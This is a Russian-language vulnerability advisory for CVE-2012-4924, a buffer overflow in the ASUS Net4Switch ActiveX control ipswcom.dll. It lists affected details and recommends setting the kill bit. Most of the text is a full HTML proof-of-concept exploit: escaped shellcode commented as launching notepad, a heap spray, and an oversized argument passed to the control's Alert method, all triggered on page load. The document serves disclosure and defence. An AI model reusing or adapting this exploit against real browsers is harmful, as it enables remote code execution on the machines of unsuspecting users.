CVE-2012-4924

Вендор

ASUS

Продукт

ASUS Net4Switch 

Тип уязвимости

Переполнение буфера

Reported

22.04.2010

Date of Public Advisory

17.02.2012

Автор

Дмитрий Евдокимов

Детальное описание

Злоумышленник может создать HTML-страницу, которая вызовет уязвимую функцию "Alert" из ActiveX ipswcom.dll с длинным параметром.

Проверено на ASUS Net4Switch ipswcom.dll 1.0.0.1 

Class CIPSWComItf 
GUID: {1B9E86D8-7CAF-46C8-9938-569B21E17A8E} 
Number of Interfaces: 1 
Default Interface: IIPSWComItf 
RegKey Safe for Script: True 
RegKey Safe for Init: False 
KillBitSet: False 

Пример
*********
<HTML> 
<HEAD> 
<TITLE>DSecRG: Asus exploit by EvdokimovDS</TITLE> 
</HEAD> 
<BODY> 

<OBJECT id='vuln' classid='clsid:1B9E86D8-7CAF-46C8-9938-569B21E17A8E'></object> 
<SCRIPT> 

function Exploit() 
{ 

//Shellcode – exec notepad var shell = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%ue0bb%u2a1d%u680a%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u6ed5%u746f%u7065%u6461%u0000"); 

//Heap-spray 
var bigbk=unescape("%u9090%u9090%u9090%u9090"); 
while(bigbk.length<0x40000) bigbk=bigbk+bigbk; 
var mem=new Array(); 
for(i=0; i<400;i++) mem[i]=bigbk+shell; 

//Buffer overflow 
var bf=unescape("%u0d0d%u0d0d"); 
var buf="";        
while (buf.length<8000) buf=buf+bf; 

vuln.Alert(buf); 
} 

Exploit(); 
</SCRIPT> 
</BODY> 
</HTML> 

Решение
**********
Решение отсутствует.
Используйте KillBit.